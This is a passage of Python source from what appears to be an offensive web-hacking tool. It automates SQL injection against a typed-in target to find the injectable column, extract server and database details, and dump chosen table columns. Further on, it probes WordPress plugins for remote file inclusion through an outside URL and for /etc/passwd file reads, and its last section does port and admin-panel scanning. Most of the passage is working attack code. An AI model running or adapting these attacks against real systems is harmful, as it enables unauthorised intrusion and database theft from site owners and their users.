auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'}) 950 | for ii in auto_sql_injection_request_column_dump_soup_pureblood: 951 | if ii.text in auto_sql_injection_request_column_dump_list: 952 | pass 953 | elif ii.text not in auto_sql_injection_request_column_dump_list: 954 | auto_sql_injection_request_column_dump_list.append(ii.text) 955 | for iii in auto_sql_injection_request_column_dump_list: 956 | print ('\t{0} -> {1}'.format(i, iii)) 957 | elif auto_sql_injection_request_result == 'Vulnerable2': # error_output() == False 958 | auto_sql_injection_request_ii = 0 959 | auto_sql_injection_request_iii = '' 960 | print ('[~] - Counting How Many Columns:') 961 | auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1')) 962 | auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser') 963 | if 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text: 964 | auto_sql_injection_orderby_result = 'err1' 965 | print ('YES') 966 | else: 967 | auto_sql_injection_orderby_result = '' 968 | if auto_sql_injection_orderby_result == 'err1': 969 | single_quote_payload = '' 970 | else: 971 | single_quote_payload = '\'' 972 | for i in range(50): 973 | if i == 0: 974 | i = i + 1 975 | print ('\tColumn -> {0}'.format(str(i))) 976 | auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i))) 977 | auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser') 978 | auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1') 979 | auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2') 980 | auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3') 981 | auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p') 982 | if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406: 983 | break 984 | if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1: 985 | auto_sql_injection_request_i = i 986 | break 987 | elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2: 988 | auto_sql_injection_request_i = i 989 | break 990 | elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3: 991 | auto_sql_injection_request_i = i 992 | break 993 | elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p: 994 | auto_sql_injection_request_i = i 995 | break 996 | if not auto_sql_injection_request_i: 997 | for i in range(50): 998 | print ('\tColumn -> {0}'.format(str(i))) 999 | auto_sql_injection_request_orderby = requests.get('{0}{1} group by {2}--+'.format(url, single_quote_payload, str(i))) 1000 | auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser') 1001 | auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1') 1002 | auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2') 1003 | auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3') 1004 | auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p') 1005 | if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406: 1006 | print ('[!] - Not Vulnerable!') 1007 | print ('') 1008 | web_application_attack() 1009 | if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1: 1010 | auto_sql_injection_request_i = i 1011 | break 1012 | elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2: 1013 | auto_sql_injection_request_i = i 1014 | break 1015 | elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3: 1016 | auto_sql_injection_request_i = i 1017 | break 1018 | elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p: 1019 | auto_sql_injection_request_i = i 1020 | break 1021 | if not auto_sql_injection_request_i: 1022 | print ('[!] - Not Able to Find How Many Columns!') 1023 | print ('') 1024 | web_application_attack() 1025 | print ('[+] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1))) 1026 | for i in range(auto_sql_injection_request_i): 1027 | auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1 1028 | if auto_sql_injection_request_ii == auto_sql_injection_request_i: 1029 | auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1 1030 | auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii)) 1031 | break 1032 | auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii)) 1033 | auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii)) 1034 | print ('') 1035 | print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan)) 1036 | if sys.version_info[0] == 3: 1037 | target = str(input('Target> ')) 1038 | if sys.version_info[0] == 2: 1039 | target = str(raw_input('Target> ')) 1040 | print ('') 1041 | if 'http://' in target: 1042 | url = target 1043 | hostname = target.replace('http://', '') 1044 | elif 'https://' in target: 1045 | url = target 1046 | hostname = target.replace('https://', '') 1047 | if '://' not in target: 1048 | url = 'http://' + target 1049 | hostname = target 1050 | print ('[~] - Finding Vulnerable Column:') 1051 | auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii)) 1052 | auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser') 1053 | auto_sql_injection_request_vulncolumn_nums = re.findall('\d+', str(auto_sql_injection_request_vulncolumn_soup)) 1054 | auto_sql_injection_request_vulncolumn_possible_vulncolumn = [] 1055 | auto_sql_injection_request_vulncolumn_column = '' 1056 | for i in auto_sql_injection_request_vulncolumn_nums: 1057 | if len(i) < 2: 1058 | auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i) 1059 | if i == 0: 1060 | pass 1061 | auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn)) 1062 | auto_sql_injection_request_vulncolumn_column = '' 1063 | for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn: 1064 | print ('\tTrying -> {0}'.format(str(i))) 1065 | auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',') 1066 | auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url) 1067 | if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text: 1068 | auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser') 1069 | auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url 1070 | auto_sql_injection_request_vulncolumn_column = i 1071 | break 1072 | if not auto_sql_injection_request_vulncolumn_column: 1073 | print ('[!] - Not Vulnerable!') 1074 | print ('') 1075 | web_application_attack() 1076 | print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column))) 1077 | auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',') 1078 | auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',') 1079 | auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',') 1080 | auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',') 1081 | auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',') 1082 | auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',') 1083 | auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',') 1084 | auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',') 1085 | auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',') 1086 | auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',') 1087 | auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',') 1088 | auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',') 1089 | auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',') 1090 | auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url) 1091 | auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url) 1092 | auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url) 1093 | auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url) 1094 | auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url) 1095 | auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url) 1096 | auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url) 1097 | auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url) 1098 | auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url) 1099 | auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url) 1100 | auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url) 1101 | auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url) 1102 | auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url) 1103 | sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser') 1104 | sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser') 1105 | sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser') 1106 | sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser') 1107 | sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser') 1108 | sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser') 1109 | sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser') 1110 | sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser') 1111 | sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser') 1112 | sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser') 1113 | sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser') 1114 | sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser') 1115 | sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser') 1116 | sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1117 | sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1118 | sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1119 | sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1120 | sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1121 | sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1122 | sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1123 | sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1124 | sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1125 | sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1126 | sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1127 | sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1128 | sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text 1129 | print ('[+] Hostname: {0}'.format(sqli_hostname)) 1130 | print ('[+] TMP Directory: {0}'.format(sqli_tmpdir)) 1131 | print ('[+] Data Directory: {0}'.format(sqli_datadir)) 1132 | print ('[+] Database Version: {0}'.format(sqli_version)) 1133 | print ('[+] Base Directory: {0}'.format(sqli_basedir)) 1134 | print ('[+] Current User: {0}'.format(sqli_user)) 1135 | print ('[+] Current Database: {0}'.format(sqli_database)) 1136 | print ('[+] Current Schema: {0}'.format(sqli_schema)) 1137 | print ('[+] System UUID Key: {0}'.format(sqli_uuid)) 1138 | print ('[+] Current System User: {0}'.format(sqli_system_user)) 1139 | print ('[+] Session User: {0}'.format(sqli_session_user)) 1140 | print ('[+] Is Sysmlink Enabled?: {0}'.format(sqli_symlink)) 1141 | print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl)) 1142 | print ('') 1143 | print ('[~] Dumping Database:') 1144 | auto_sql_injection_request_dios_soup_pureblood_list = [] 1145 | auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'}) 1146 | for i in auto_sql_injection_request_dios_soup_pureblood: 1147 | if i.text in auto_sql_injection_request_dios_soup_pureblood_list: 1148 | pass 1149 | else: 1150 | auto_sql_injection_request_dios_soup_pureblood_list.append(i.text) 1151 | for i in auto_sql_injection_request_dios_soup_pureblood_list: 1152 | print ('\t{0}'.format(i)) 1153 | print ('') 1154 | sqli_table = '' 1155 | user_choice = '' 1156 | sqli_column = [] 1157 | print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan)) 1158 | while True: 1159 | if sys.version_info[0] == 3: 1160 | if sqli_table: 1161 | pass 1162 | elif not sqli_table: 1163 | user_choice1 = str(input('Table> ')) 1164 | sqli_table = user_choice1 1165 | user_choice = str(input('\tColumn> ')) 1166 | if user_choice == 'done' or user_choice == 'exit' or user_choice == '': 1167 | break 1168 | else: 1169 | sqli_column.append(user_choice) 1170 | if sys.version_info[0] == 2: 1171 | if sqli_table: 1172 | pass 1173 | elif not sqli_table: 1174 | user_choice1 = str(raw_input('Table> ')) 1175 | sqli_table = user_choice1 1176 | user_choice = str(raw_input('\tColumn> ')) 1177 | if user_choice == 'done' or user_choice == 'exit' or user_choice == '': 1178 | break 1179 | else: 1180 | sqli_column.append(user_choice) 1181 | print ('') 1182 | print ('[~] Dumping Columns:') 1183 | for i in sqli_column: 1184 | auto_sql_injection_request_column_dump_list = [] 1185 | auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table) 1186 | auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',') 1187 | auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('', i) 1188 | auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url) 1189 | auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser') 1190 | auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'}) 1191 | for ii in auto_sql_injection_request_column_dump_soup_pureblood: 1192 | if ii.text in auto_sql_injection_request_column_dump_list: 1193 | pass 1194 | elif ii.text not in auto_sql_injection_request_column_dump_list: 1195 | auto_sql_injection_request_column_dump_list.append(ii.text) 1196 | for iii in auto_sql_injection_request_column_dump_list: 1197 | print ('\t{0} -> {1}'.format(i, iii)) 1198 | 1199 | def auto_xss_injection(self, xi_url): 1200 | print ('') 1201 | 1202 | def wordpress_vulnerability_check(self, wvc_url): 1203 | print ('[#] - Checking (WordPress Woocommerce - Directory Craversal):') 1204 | wp_woocommerce_wvc_url = '' 1205 | wp_woocommerce = requests.get(wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain') 1206 | wp_woocommerce_wvc_url = wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain' 1207 | if wp_woocommerce.status_code == 200: 1208 | print ('\t[+] - Vulnerable! ~ ' + wp_woocommerce_wvc_url) 1209 | elif wp_woocommerce.status_code == 301: 1210 | print ('\t[!] - Redirected! ~ ' + wp_woocommerce_wvc_url) 1211 | elif wp_woocommerce.status_code == 403: 1212 | print ('\t[!] - Forbidden! ~ ' + wp_woocommerce_wvc_url) 1213 | else: 1214 | print ('\t[!] - 404 Found! ~ ' + wp_woocommerce_wvc_url) 1215 | print ('\n\n[#] - Checking (Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting):') 1216 | wp_plugin_booking_calendar_wvc_url = '' 1217 | wp_plugin_booking_calendar = requests.get(wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php') 1218 | if wp_plugin_booking_calendar.status_code == 200: 1219 | wp_plugin_booking_calendar = wp_plugin_booking_calendar 1220 | wp_plugin_booking_calendar_wvc_url = wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php' 1221 | elif wp_plugin_booking_calendar.status_code == 404: 1222 | wp_plugin_booking_calendar = requests.get(wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php') 1223 | if wp_plugin_booking_calendar.status_code == 200: 1224 | wp_plugin_booking_calendar = wp_plugin_booking_calendar 1225 | wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php' 1226 | else: 1227 | wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php' 1228 | wp_plugin_booking_calendar = 'Not Found' 1229 | if wp_plugin_booking_calendar == 'Not Found': 1230 | wp_plugin_booking_calendar_wvc_url = wvc_url + '/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php' 1231 | print ('\t[!] - 404 Found! ~ ' + wp_plugin_booking_calendar_wvc_url) 1232 | else: 1233 | print ('\t[+] - XSS Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=') 1234 | print ('\t[+] - SQLMap Maybe Vulnerable! ~ ' + wp_plugin_booking_calendar_wvc_url + '?month=') 1235 | print ('\t[+] - Unfortunately I can\'t handle alerts without using Selenium and you should manually use SQLMap. Try to do it manually') 1236 | print ('\n\n[#] - Checking (WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion):') 1237 | wp_plugin_wp_spritz_wvc_url = '' 1238 | wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php') 1239 | if wp_plugin_wp_spritz.status_code == 200: 1240 | wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt') 1241 | wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=https://raw.githubusercontent.com/cr4shcod3/pureblood/master/l33t/rfi.txt' 1242 | if 'PureBlood RFI ~Cr4sHCoD3' in wp_plugin_wp_spritz.text: 1243 | print ('\t[+] - Vulnerable! ~ ' + wp_plugin_wp_spritz_wvc_url) 1244 | wp_plugin_wp_spritz = requests.get(wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?wvc_url=/etc/passwd') 1245 | if wp_plugin_wp_spritz.status_code == 403 or wp_plugin_wp_spritz.status_code == 400: 1246 | print ('\t[+] - Try to bypass LFI! ~ ' + wp_woocommerce_wvc_url) 1247 | elif 'The page you are trying to access is restricted due to a security rule.' in wp_plugin_wp_spritz.text: 1248 | print ('\t[+] - Try to bypass LFI! ~ ' + wp_woocommerce_wvc_url) 1249 | elif wp_plugin_wp_spritz.status_code == 404: 1250 | wp_plugin_wp_spritz_wvc_url = wvc_url + '/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php' 1251 | print ('\t[!] - 404 Found! ~ ' + wp_plugin_wp_spritz_wvc_url) 1252 | print ('\n\n[#] - Checking (WordPress Plugin Events Calendar - \'event_id\' SQL Injection):') 1253 | wp_plugin_events_calendar_wvc_url = '' 1254 | wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1') 1255 | if wp_plugin_events_calendar.status_code == 200: 1256 | wp_plugin_events_calendar_result = '' 1257 | wp_plugin_events_calendar = requests.get(wvc_url + '/event.php?event_id=1\'') 1258 | wp_plugin_events_calendar_wvc_url = wvc_url + '/event.php?event_id=1\'' 1259 | for db, errors in dbms_errors.items(): 1260 | for error in errors: 1261 | if re.compile(error).search(wp_plugin_events_calendar.text): 1262 | wp_plugin_events_calendar_result = 'Vulnerable' 1263 | print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url) 1264 | if wp_plugin_events_calendar_result == '': 1265 | print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url) 1266 | elif wp_plugin_events_calendar.status_code == 404: 1267 | wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1') 1268 | wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1' 1269 | if wp_plugin_events_calendar.status_code == 200: 1270 | wp_plugin_events_calendar_result = '' 1271 | wp_plugin_events_calendar = requests.get(wvc_url + '/view-event.php?event_id=1\'') 1272 | wp_plugin_events_calendar_wvc_url = wvc_url + '/view-event.php?event_id=1\'' 1273 | for db, errors in dbms_errors.items(): 1274 | for error in errors: 1275 | if re.compile(error).search(wp_plugin_events_calendar.text): 1276 | wp_plugin_events_calendar_result = 'Vulnerable' 1277 | print ('\t[+] - ' + db + ' Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url) 1278 | if wp_plugin_events_calendar_result == '': 1279 | print ('\t[!] - Not Vulnerable! ~ ' + wp_plugin_events_calendar_wvc_url) 1280 | elif wp_plugin_events_calendar.status_code == 404: 1281 | print ('\t[!] - 404 Found! ~ ' + wp_plugin_events_calendar_wvc_url) 1282 | 1283 | 1284 | 1285 | class WebPentest: 1286 | def banner_grab(self, bg_url): 1287 | try: 1288 | banner_grab_request = requests.get(bg_url) 1289 | banner_grab_result = banner_grab_request.headers 1290 | banner_grab_result = str(banner_grab_result).replace("{'", "").replace("'}", "").replace("': '", ": ").replace("', '", ",\n") 1291 | self.banner_grab_result = banner_grab_result 1292 | return self.banner_grab_result 1293 | except: 1294 | print("Could not grab a banner info") 1295 | 1296 | def whois(self, w_url): 1297 | try: 1298 | whois_query = whois.whois(w_url) 1299 | self.whois_result = whois_query 1300 | return self.whois_result 1301 | except: 1302 | print("Could not find perform whois") 1303 | 1304 | def traceroute(self, t_hostname): 1305 | try: 1306 | traceroute_request = requests.get('https://api.hackertarget.com/mtr/?q=' + t_hostname) 1307 | traceroute_response = traceroute_request.text 1308 | traceroute_final = """{0}""".format(str(traceroute_response)) 1309 | self.traceroute_result = traceroute_final 1310 | return self.traceroute_result 1311 | except: 1312 | print("Could not perform traceroute") 1313 | 1314 | def dns_record(self, dr_hostname): 1315 | try: 1316 | dns_record_list = [] 1317 | for i in ids: 1318 | t = threading.Thread(target=dns_record_scanner, args=(dr_hostname, i, dns_record_list, )) 1319 | t.start() 1320 | t.join() 1321 | self.dns_record_result = dns_record_list 1322 | return self.dns_record_result 1323 | except: 1324 | print("Could not find DNS record") 1325 | 1326 | def reverse_dns_lookup(self, rdl_ip): 1327 | try: 1328 | rdl_ip = rdl_ip + '/24' 1329 | reverse_dns_lookup_request = requests.get('https://api.hackertarget.com/reversedns/?q=' + rdl_ip) 1330 | reverse_dns_lookup_response = reverse_dns_lookup_request.text 1331 | reverse_dns_lookup_final = """{0}""".format(str(reverse_dns_lookup_response)) 1332 | self.reverse_ip_lookup_result = reverse_dns_lookup_final 1333 | return self.reverse_ip_lookup_result 1334 | except: 1335 | print("Could not perform dns reverse lookup") 1336 | 1337 | def zone_transfer_lookup(self, ztl_hostname): 1338 | try: 1339 | zone_transfer_lookup_request = requests.get('https://api.hackertarget.com/zonetransfer/?q=' + ztl_hostname) 1340 | zone_transfer_lookup_response = zone_transfer_lookup_request.text 1341 | zone_transfer_lookup_final = """{0}""".format(str(zone_transfer_lookup_response)) 1342 | self.zone_transfer_lookup_result = zone_transfer_lookup_final 1343 | return self.zone_transfer_lookup_result 1344 | except: 1345 | print("Could not perform zone transfer lookup") 1346 | 1347 | def port_scan(self, ps_hostname, ps_pend): #https://stackoverflow.com/a/38210023 1348 | port_scan_list = [] 1349 | threads = [] 1350 | output = {} 1351 | delay = 10 1352 | for i in range(ps_pend + 1): 1353 | t = threading.Thread(target=TCP_connect, args=(ps_hostname, i, delay, output)) 1354 | threads.append(t) 1355 | for i in range(ps_pend + 1): 1356 | threads[i].start() 1357 | for i in range(ps_pend + 1): 1358 | threads[i].join() 1359 | for i in range(ps_pend + 1): 1360 | if output[i] == 'Open': 1361 | port_scan_list.append('[+] Port Open - ' + str(i)) 1362 | self.port_scan_result = port_scan_list 1363 | return self.port_scan_result 1364 | 1365 | def admin_panel_scan(self, ads_url): 1366 | admin_panel_valid = [] 1367 | admin_panel_redirect = [] 1368 | ads_urls = [] 1369 | r_path = [] 1370 | ads_r_urls = [] 1371 | robots = ['/robot.txt', '/robots.txt'] 1372 | for i in admin_panel_list: 1373 | ads_urls.append(ads_url + i) 1374 | for i in robots: 1375 | r_robots = requests.get(ads_url + i) 1376 | if r_robots.status_code == 200: 1377 | r_robots = r_robots 1378 | else: 1379 | r_robots = '' 1380 | if r_robots == '': 1381 | pass 1382 | else: 1383 | robots = str(r_robots.text) 1384 | for i in robots.split("\n"): 1385 | if i.startswith('Allow'): 1386 | r_path.append(i.split(': ')[1].split(' ')[0]) 1387 | elif i.startswith('Disallow'): 1388 | r_path.append(i.split(': ')[1].split(' ')[0]) 1389 | for i in r_path: 1390 | ads_r_urls.append(ads_url + i) 1391 | for i in ads_r_urls: 1392 | ads_r_urls_request = requests.get(i) 1393 | if 'Admin' in ads_r_urls_request.text or 'Login' in ads_r_urls_request.text: 1394 | r_admin_panel = i 1395 | admin_panel_valid.append(i) 1396 | elif 'admin' in ads_r_urls_request.text or 'login' in ads_r_urls_request.text: 1397 | r_admin_panel = i 1398 | admin_panel_valid.append(i) 1399 | elif 'Username' in ads_r_urls_request.text or 'Password' in ads_r_urls_request.text: 1400 | r_admin_panel = i 1401 | admin_panel_valid.append(i) 1402 | elif 'username' in ads_r_urls_request.text or 'password' in ads_r_urls_request.text: 1403 | r_admin_panel = i 1404 | admin_panel_valid.append(i) 1405 | else: 1406 | r_admin_panel = None 1407 | if not admin_panel_valid: 1408 | for i in ads_urls: 1409 | admin_scan_request = requests.get(i) 1410 | if admin_scan_request.status_code == 200: 1411 | admin_panel_valid.append(i) 1412 | break 1413 | elif admin_scan_request.status_code == 301 or admin_scan_request.status_code == 302: 1414 | admin_panel_redirect.append(i) 1415 | else: 1416 | pass 1417 | admin_panel_valid = list(set(admin_panel_valid)) 1418 | for i in admin_panel_redirect: 1419 | admin_panel_valid.append(i + ' - 301') 1420 | if not admin_panel_valid: 1421 | webbrowser.open_new_tab(google_hacking + 'site:' + ads_url + '+inurl:login | admin | user | cpanel | account | moderator | phpmyadmin | /cp') 1422 | self.admin_panel_scan_result = admin_panel_valid 1423 | return self.admin_panel_scan_result 1424 | 1425 | def subdomain_scan(self, ss_hostname, subdomain_list): 1426 | so_200 = [] 1427 | so_301 = [] 1428 | so_302 = [] 1429 | so_403 = [] 